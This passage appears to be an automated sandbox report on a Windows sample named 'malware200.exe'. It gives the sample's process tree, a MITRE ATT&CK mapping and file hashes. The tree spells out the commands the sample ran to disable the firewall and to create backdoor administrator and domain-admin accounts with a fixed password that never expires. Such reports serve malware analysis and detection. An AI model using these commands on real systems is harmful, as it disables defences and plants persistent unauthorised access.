C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5669758,0x7fef5669768,0x7fef5669778
  2⤵
  PID:1912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:2
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2316 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk
    3⤵
    PID:1588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1700 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:2
  2⤵
  PID:2068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2248 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3512 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=1108 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3584 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4148 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:1
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4228 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5104 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5140 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5344 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:3008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5132 --field-trial-handle=1220,i,11707279280530286106,597195609961004056,131072 /prefetch:8
  2⤵
  PID:2032
- C:\Users\Admin\Downloads\malware200.exe
  "C:\Users\Admin\Downloads\malware200.exe"
  2⤵
  PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
    3⤵
    PID:1260
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall set opmode Disable
      4⤵
      Modifies Windows Firewall
      PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
    3⤵
    PID:2992
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
    3⤵
    PID:2812
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:1052
- - C:\Windows\SysWOW64\net.exe
    net user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:2004
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
      4⤵
      PID:984
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators AstNet /add
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators AstNet /add
      4⤵
      PID:3000
- - C:\Windows\SysWOW64\net.exe
    net localgroup "remote desktop users" AstNet /add
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
      4⤵
      PID:692
- - C:\Windows\SysWOW64\net.exe
    net group "domain admins" AstNet /add
    3⤵
    PID:2856
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 group "domain admins" AstNet /add
      4⤵
      PID:2392
- - C:\Windows\SysWOW64\net.exe
    net user AstNet /active:yes
    3⤵
    PID:1532
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user AstNet /active:yes
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\net.exe
    net user AstNet /expires:never
    3⤵
    PID:1776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user AstNet /expires:never
      4⤵
      PID:708
- - C:\Windows\SysWOW64\net.exe
    net user AstNet h3lp12desk
    3⤵
    PID:1268
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user AstNet h3lp12desk
      4⤵
      PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
      4⤵
      PID:2136
- - C:\Windows\SysWOW64\net.exe
    net user server_sys h3lp12desk /expires:never /add
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
      4⤵
      PID:2012
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators server_sys /add
    3⤵
    PID:2492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators server_sys /add
      4⤵
      PID:1960
- - C:\Windows\SysWOW64\net.exe
    net localgroup "remote desktop users" server_sys /add
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
      4⤵
      PID:1580
- - C:\Windows\SysWOW64\net.exe
    net group "domain admins" server_sys /add
    3⤵
    PID:848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 group "domain admins" server_sys /add
      4⤵
      PID:2464
- - C:\Windows\SysWOW64\net.exe
    net user server_sys /active:yes
    3⤵
    PID:1260
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user server_sys /active:yes
      4⤵
      PID:1796
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      PID:2560
- - C:\Windows\SysWOW64\net.exe
    net user server_sys /expires:never
    3⤵
    PID:992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user server_sys /expires:never
      4⤵
      PID:1232
- - C:\Windows\SysWOW64\net.exe
    net user server_sys h3lp12desk
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user server_sys h3lp12desk
      4⤵
      PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
    3⤵
    PID:1296
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
      4⤵
      PID:1744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 872
    3⤵
    - Program crash
    PID:1940

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1672

C:\Users\Admin\Downloads\malware200.exe
"C:\Users\Admin\Downloads\malware200.exe"
1⤵
PID:2056
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators AstNet /add
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators AstNet /add
    3⤵
    PID:2304
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" AstNet /add
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
    3⤵
    PID:2444
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" AstNet /add
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" AstNet /add
    3⤵
    PID:2608
- C:\Windows\SysWOW64\net.exe
  net user AstNet /active:yes
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /active:yes
    3⤵
    PID:1552
- C:\Windows\SysWOW64\net.exe
  net user AstNet /expires:never
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /expires:never
    3⤵
    PID:1568
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk
    3⤵
    PID:1388
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk /expires:never /add
  2⤵
  PID:2952
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
    3⤵
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
    3⤵
    PID:2464
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators server_sys /add
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators server_sys /add
    3⤵
    PID:1268
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" server_sys /add
  2⤵
  PID:2476
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
    3⤵
    PID:1744
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" server_sys /add
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" server_sys /add
    3⤵
    PID:2440
- C:\Windows\SysWOW64\net.exe
  net user server_sys /active:yes
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /active:yes
    3⤵
    PID:2148
- C:\Windows\SysWOW64\net.exe
  net user server_sys /expires:never
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys /expires:never
    3⤵
    PID:2076
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk
  2⤵
  PID:472
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user server_sys h3lp12desk
    3⤵
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
  2⤵
  PID:848
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
    3⤵
    PID:2496

C:\Users\Admin\Downloads\malware200.exe
"C:\Users\Admin\Downloads\malware200.exe"
1⤵
PID:2708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode Disable
    3⤵
    - Modifies Windows Firewall
    PID:2424
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk /expires:never /add
  2⤵
  PID:2636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
  2⤵
  PID:1728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
  2⤵
  PID:1260
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators AstNet /add
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators AstNet /add
    3⤵
    PID:2536
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 292
  2⤵
  - Program crash
  PID:1740

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state off
1⤵
- Process spawned unexpected child process
- Modifies Windows Firewall
PID:888

C:\Users\Admin\Downloads\malware200.exe
"C:\Users\Admin\Downloads\malware200.exe"
1⤵
PID:1620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
  2⤵
  PID:1376
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1152
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk /expires:never /add
  2⤵
  PID:836
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode Disable
    3⤵
    - Modifies Windows Firewall
    PID:1344
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 296
  2⤵
  - Program crash
  PID:2564

C:\Users\Admin\Downloads\malware200.exe
"C:\Users\Admin\Downloads\malware200.exe"
1⤵
PID:1196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode Disable
    3⤵
    - Modifies Windows Firewall
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:2148
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk /expires:never /add
  2⤵
  PID:692
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
    3⤵
    PID:2800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
  2⤵
  PID:580
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2384
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators AstNet /add
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators AstNet /add
    3⤵
    PID:2020
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" AstNet /add
  2⤵
  PID:1188
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
    3⤵
    PID:472
- C:\Windows\SysWOW64\net.exe
  net group "domain admins" AstNet /add
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 group "domain admins" AstNet /add
    3⤵
    PID:2344
- C:\Windows\SysWOW64\net.exe
  net user AstNet /active:yes
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /active:yes
    3⤵
    PID:2332
- C:\Windows\SysWOW64\net.exe
  net user AstNet /expires:never
  2⤵
  PID:2356
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 user AstNet /expires:never
    3⤵
    PID:2072
- C:\Windows\SysWOW64\net.exe
  net user server_sys h3lp12desk /expires:never /add
  2⤵
  PID:2932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
  2⤵
  PID:2276
- C:\Windows\SysWOW64\net.exe
  net user AstNet h3lp12desk
  2⤵
  PID:1384
- C:\Windows\SysWOW64\net.exe
  net localgroup administrators server_sys /add
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup administrators server_sys /add
    3⤵
    PID:328
- C:\Windows\SysWOW64\net.exe
  net localgroup "remote desktop users" server_sys /add
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
    3⤵
    PID:2636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
1⤵
PID:1860

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
1⤵
PID:2352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
6575dca6407b31bcc3a30fdacbee3b2b

SHA1
dce0316cd6be8dcb835e14c12b043164427d5a4b

SHA256
f0fd0826229aee8cd8da645176f5caa5a89e9de65c2af5248b7f6debf5802114

SHA512
92d4f369f8b52c5734d1f8c3b1dbccf962e3c1a03265c02cb784c8d41d1762c2e2a970574cca6ae27b759cbbba30b91b9a965a9ccad8cc10d05cf8d77aa3aac4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
99354c75c1d413913aeea4f927a05da9

SHA1
987ab1fefc4a13f6ad5301b640ee5b476290cf96

SHA256
6e6ac84ac63455dbc5573335992eb07a5b1bb9370d5932a01f1612701df313b3

SHA512
3d44aebbf3e7516e1c5464578b535625576b459ac2b14526861171496cbe16e545977cca2d13708132c02bfb120b04443f5ddca081ab6a3868f3bc557d72a67b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
83238a0f0ad9a7f3250a4f323aab90b6

SHA1
1cee2d0d7c54d3d86532f163ceabdea9a8b483af

SHA256
e6226eefdb9d1fb1de0d7a7a813ffb5daadf5eec6580e6c6312e730771b648fe

SHA512
ed7c9f8e440523111d2a1461fe77909731d100c25580a36a47db29172216f38c8269d634e57231323619c8135dca5981afb8c47350deb974d8e811c6c461aaf7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
36cacabcc94a4d645fe24c322770bd90

SHA1
40fb3aed991d0557a838b3d0e160ff4b4dd20a9d

SHA256
0a8578c99e088bba6e4aef6ba5a86c5607e59c3b51084a0320771ea549329500

SHA512
56a01eac16f5091c05903396d1ae39c6586f55425988eded4fa52cc203a6f4798d935d006ab85952892ddcc6d192d74262920c62e2c2124f8ef9dcb7307f3efd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6b9a67cac059a58907c3c7290b49420e

SHA1
f1a82e8c27f0712eb62db67c5f094c4d29e2e65f

SHA256
798f4409a2e4821a26c2549bf64913812246a0bf84a0597905271575c0d8ef14

SHA512
f9932d486864ae03a418a8b1914cb5850a30161a8f1e8383a20e5b4f6af6878d1b7d2ffd9d47e05365d557e01316f9c8ca95cc182df37c04e500a180ae4b28aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0b02c6c034b05fcbfc5dd97a5d63ff54

SHA1
8d00794777c5de3fcc4ce73e0fea5159a47bf9cd

SHA256
2561cabfc18c7de0d55832a42e6d5d562c6cee346b641cc3ac705421d48b0711

SHA512
db3cb3ec0f743389104adfa1b57f748d1fc1b2414c21c0023d04bc591a950c3d9f72e938688ac65e727b97796e0bea431e80f4c7b77023ce0f9531a947754b51

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a598874523c13b9a35613b878d9aeb3f

SHA1
44b14d26aaca449ab9635bc66fa6d4755bda0bc4

SHA256
4c44b4b32d91457b5fb8d6340c3af9366d1f7442e5344a6f0fa454d9d77a7cf5

SHA512
e8612b4064c2337f5e10af86cbc0b8007143f626b1f368d7b1575c46fa8a0f54764f04644a711d34cd1f9d248f97dbbe41f66cf006695a811ce348416913c664

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d3cfda2a038f988883f29ce1cdc4b570

SHA1
